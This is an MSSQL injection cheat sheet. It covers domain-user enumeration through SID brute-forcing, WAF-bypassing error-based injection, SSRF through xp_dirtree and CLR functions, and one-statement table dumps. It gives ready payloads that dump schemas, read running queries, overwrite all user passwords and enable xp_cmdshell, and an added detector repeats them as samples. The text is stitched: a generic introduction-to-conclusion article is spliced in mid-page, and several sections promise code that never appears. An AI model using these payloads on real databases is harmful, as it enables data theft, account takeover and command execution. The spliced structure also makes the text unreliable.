MSSQL Injection
Active Directory enumeration
It is possible to enumerate domain users via SQL injection inside an MSSQL server using the following MSSQL functions:
SELECT DEFAULT_DOMAIN(): get the current domain name.
master.dbo.fn_varbintohexstr(SUSER_SID('DOMAIN\Administrator')): if you know the domain name (DOMAIN in this example), this function returns the SID of the Administrator user in hex format. It will look like 0x01050000000[...]0000f401; note how the last 4 bytes are the number 500 in big-endian format, which is the usual ID of the administrator user. This function therefore lets you learn the domain ID (all bytes except the last 4).
SUSER_SNAME(0x01050000000[...]0000e803): this function returns the username of the given ID (if it exists); here 0000e803 in big endian == 1000 (usually the ID of the first regular user created). You could then brute-force user IDs from 1000 to 2000 and likely obtain the names of every domain user, for example with a function like the following:
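As an added example (not code from the original page), the following Python parses the binary SID layout that the fn_varbintohexstr call above prints, splits it into the domain identifier and the RID, and rebuilds the hex literal for another RID; the SID value used is constructed, not a real domain's. In the binary form each sub-authority, including the final RID, is a little-endian 32-bit integer, so RID 500 appears as the bytes f4 01 00 00.

```python
# Added example: decode/encode the binary SID that
# master.dbo.fn_varbintohexstr(SUSER_SID(...)) prints.
# Layout: revision (1 byte), sub-authority count (1 byte), identifier
# authority (6 bytes, big-endian), then N sub-authorities (4 bytes each,
# little-endian). The RID is the last sub-authority.

# Constructed sample for a made-up domain, RID 500 (not a real SID).
SAMPLE_SID_HEX = "0x01050000000000051500000078563412cdab000000000001f4010000"

def parse_sid(hex_str):
    """Return (revision, identifier_authority, [sub_authorities...])."""
    raw = bytes.fromhex(hex_str[2:] if hex_str.lower().startswith("0x") else hex_str)
    if len(raw) < 8:
        raise ValueError("SID too short")
    revision, count = raw[0], raw[1]
    if len(raw) != 8 + 4 * count:
        raise ValueError("length does not match sub-authority count")
    authority = int.from_bytes(raw[2:8], "big")
    subs = [int.from_bytes(raw[8 + 4 * i:12 + 4 * i], "little") for i in range(count)]
    return revision, authority, subs

def sid_to_string(hex_str):
    """Render the SID in the familiar S-1-5-21-...-RID form."""
    revision, authority, subs = parse_sid(hex_str)
    return "S-%d-%d-%s" % (revision, authority, "-".join(map(str, subs)))

def domain_and_rid(hex_str):
    """Split into (domain SID string, RID): all but the last 4 bytes are the domain."""
    revision, authority, subs = parse_sid(hex_str)
    domain = "S-%d-%d-%s" % (revision, authority, "-".join(map(str, subs[:-1])))
    return domain, subs[-1]

def sid_hex(domain_sid, rid):
    """Inverse: build the 0x... literal for domain_sid + rid, as SUSER_SNAME expects."""
    parts = domain_sid.split("-")
    if len(parts) < 4 or parts[0] != "S":
        raise ValueError("expected S-R-A-... form")
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]] + [rid]
    raw = bytes([revision, len(subs)]) + authority.to_bytes(6, "big")
    raw += b"".join(s.to_bytes(4, "little") for s in subs)
    return "0x" + raw.hex()

if __name__ == "__main__":
    print(sid_to_string(SAMPLE_SID_HEX))   # S-1-5-21-305419896-43981-16777216-500
    domain, rid = domain_and_rid(SAMPLE_SID_HEX)
    print(domain, rid)                     # S-1-5-21-305419896-43981-16777216 500
    print(sid_hex(domain, 1000))           # ...e8030000 (1000 = 0x3e8, little-endian)
```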
Alternative error-based vectors
Error-based SQL injections typically use constructions such as +AND+1=@@version-- and variations built on the «OR» operator. Queries containing such expressions are usually blocked by WAFs. As a bypass, concatenate a string using the %2b character with the result of a call to one of the specific functions that raise a data type conversion error on the data you are after.
Some examples of such functions are:
SUSER_NAME()
USER_NAME()
PERMISSIONS()
DB_NAME()
FILE_NAME()
TYPE_NAME()
COL_NAME()
Example of USER_NAME() usage:
SSRF
These SSRF tricks were taken from here
fn_xe_file_target_read_file
It requires the VIEW SERVER STATE permission on the server.
fn_get_audit_file
It requires the CONTROL SERVER permission.
fn_trace_gettable
It requires the CONTROL SERVER permission.
xp_dirtree, xp_fileexists, xp_subdirs
Stored procedures such as xp_dirtree, although not officially documented by Microsoft, have been described by others online because of their usefulness for network operations within MSSQL. These procedures are often used for out-of-band data exfiltration, as shown in various examples and posts.
For example, the xp_dirtree stored procedure is used to make network requests, but it is limited to TCP port 445 only. The port number cannot be changed, but it allows reading from network shares. Its usage is shown in the following SQL script:
It is important to note that this method may not work in every system configuration, for example on Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) running on Windows Server 2016 Datacenter with default settings.
In addition, other stored procedures such as master..xp_fileexist and xp_subdirs can achieve similar results. More details about xp_fileexist can be found in this TechNet article.
xp_cmdshell
Obviously, you could also use xp_cmdshell to execute something that triggers an SSRF. For more information, read the relevant section on this page:
MSSQL User Defined Function - SQLHttp
Creating a CLR UDF (Common Language Runtime User Defined Function), which is code written in any .NET language and compiled into a DLL, to be loaded into MSSQL for executing custom functions, is a process that requires dbo access. This means it is usually only possible when the database connection is made as sa or with an Administrator role.
A Visual Studio project and installation instructions are provided in this Github repository to facilitate loading the binary into MSSQL as a CLR assembly, thereby enabling HTTP GET requests from within MSSQL.
The core of this functionality is in the http.cs file, which uses the WebClient class to execute a GET request and fetch the content as shown below:
Before executing the CREATE ASSEMBLY SQL command, it is recommended to run the following SQL snippet to add the SHA512 hash of the assembly to the server's list of trusted assemblies (visible via select * from sys.trusted_assemblies;):
After successfully adding the assembly and creating the function, the following SQL code can be used to perform HTTP requests:
Quick trick: retrieving the whole table contents in one statement
A concise way to retrieve a table's full contents in a single statement is to use the FOR JSON clause. This approach is simpler than the FOR XML clause, which requires a specific mode such as "raw". FOR JSON is preferred for its brevity.
Here is how to retrieve the schemas, tables and columns of the current database:
https://vuln.app/getItem?id=1'+and+1=(select+concat_ws(0x3a,table_schema,table_name,column_name)a+from+information_schema.columns+for+json+auto)--
Retrieving the Current Query
For users granted the VIEW SERVER STATE permission on the server, it's possible to see all executing sessions on the SQL Server instance. However, without this permission, users can only view their current session. The currently executing SQL query can be retrieved by accessing sys.dm_exec_requests and sys.dm_exec_sql_text:
https://vuln.app/getItem?id=-1%20union%20select%20null,(select+text+from+sys.dm_exec_requests+cross+apply+sys.dm_exec_sql_text(sql_handle)),null,null
To check if you have the VIEW SERVER STATE permission, the following query can be used:
MSSQL Injection
Introduction
MSSQL Injection is a technique used to exploit vulnerabilities in web applications that use Microsoft SQL Server as their database management system. By injecting malicious SQL queries into user input fields, an attacker can manipulate the application's database and potentially gain unauthorized access to sensitive information.
Exploiting MSSQL Injection
To exploit MSSQL Injection, an attacker needs to identify vulnerable input fields in the target web application. These are typically user input fields such as search boxes, login forms, or URL parameters.
Once a vulnerable input field is identified, the attacker can inject SQL queries to manipulate the application's database. The goal is to craft a malicious query that will be executed by the database server, allowing the attacker to extract or modify data.
Example
Consider the following URL:
In this example, the id parameter is vulnerable to MSSQL Injection. The attacker has injected a UNION SELECT statement to retrieve the version of the MSSQL server.
Protection and Prevention
To protect against MSSQL Injection attacks, it is important to implement proper input validation and sanitization techniques. This includes validating user input, using parameterized queries or prepared statements, and applying strict input filtering.
Regular security assessments and penetration testing can also help identify and mitigate potential vulnerabilities in web applications.
Conclusion
MSSQL Injection is a serious security vulnerability that can lead to unauthorized access and data leakage in web applications. By understanding the techniques used by attackers and implementing proper security measures, organizations can protect their applications and data from these types of attacks.
https://vuln.app/getItem?id=1+union+select+null,@@version,null+from.users--
So for example, multiple queries such as:
Adding a useless exec() at the end and making the WAF believe this is not a valid query
admina'union select 1,'admin','testtest123'exec('select 1')--
This will become:
SELECT id, username, password FROM users WHERE username = 'admina'union select 1,'admin','testtest123' exec('select 1')--'
Using weird built-up queries
admin'exec('update[users]set[password]=''a''')--
This will become:
SELECT id, username, password FROM users WHERE username = 'admin' exec('update[users]set[password]=''a''')--'
Or enabling xp_cmdshell
admin'exec('sp_configure''show advanced option'',''1''reconfigure')exec('sp_configure''xp_cmdshell'',''1''reconfigure')--
This will become:
select * from users where username = ' admin' exec('sp_configure''show advanced option'',''1''reconfigure') exec('sp_configure''xp_cmdshell'',''1''reconfigure')--'
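The following Python, added here and not part of the original page, normalises request parameters the way the backend would decode them and flags the injection shapes this page describes: union/exec glued directly onto a closing quote (as in the WAF bypasses above), FOR JSON dumps, sys.dm_exec_sql_text reads, and xp_/sp_configure calls. The sample inputs are the page's own URLs and payloads plus one benign request; the rule names are my own.

```python
import re
from urllib.parse import unquote_plus

# Sample inputs: the URLs and payloads shown on this page plus one benign
# request. They are typed in here for the demo, not captured traffic.
SAMPLE_INPUTS = [
    "/getItem?id=1",
    "/getItem?id=1'+and+1=(select+concat_ws(0x3a,table_schema,table_name,column_name)a+from+information_schema.columns+for+json+auto)--",
    "/getItem?id=-1%20union%20select%20null,(select+text+from+sys.dm_exec_requests+cross+apply+sys.dm_exec_sql_text(sql_handle)),null,null",
    "/getItem?id=1+union+select+null,@@version,null+from.users--",
    "admina'union select 1,'admin','testtest123'exec('select 1')--",
    "admin'exec('update[users]set[password]=''a''')--",
    "admin'exec('sp_configure''show advanced option'',''1''reconfigure')exec('sp_configure''xp_cmdshell'',''1''reconfigure')--",
]

# T-SQL accepts a keyword directly after a closing quote ('admin'union,
# 'admin'exec), so the union/exec patterns do not require whitespace before
# the keyword; \b still keeps dm_exec_sql_text from tripping the exec rule.
RULES = {
    "union_select": re.compile(r"union\s*(all\s+)?select\b"),
    "stacked_exec": re.compile(r"\bexec\s*\("),
    "for_json_xml": re.compile(r"\bfor\s+(json|xml)\b"),
    "exec_dmv": re.compile(r"\bsys\.dm_exec_(requests|sql_text)\b"),
    "extended_proc": re.compile(r"\b(xp_cmdshell|xp_dirtree|xp_fileexists?|xp_subdirs|sp_configure)\b"),
}

def normalise(raw):
    """Decode as the backend sees it: %xx and '+' become characters, block
    comments become whitespace, case is folded, whitespace runs collapse."""
    text = unquote_plus(raw).lower()
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text)

def classify(raw):
    """Return the sorted names of the rules that fire for one request/parameter."""
    text = normalise(raw)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def scan(inputs):
    """Map each input to its fired rules; benign inputs map to an empty list."""
    return {raw: classify(raw) for raw in inputs}

if __name__ == "__main__":
    for raw, hits in scan(SAMPLE_INPUTS).items():
        print(f"{str(hits or '-'):40} {raw[:70]}")
```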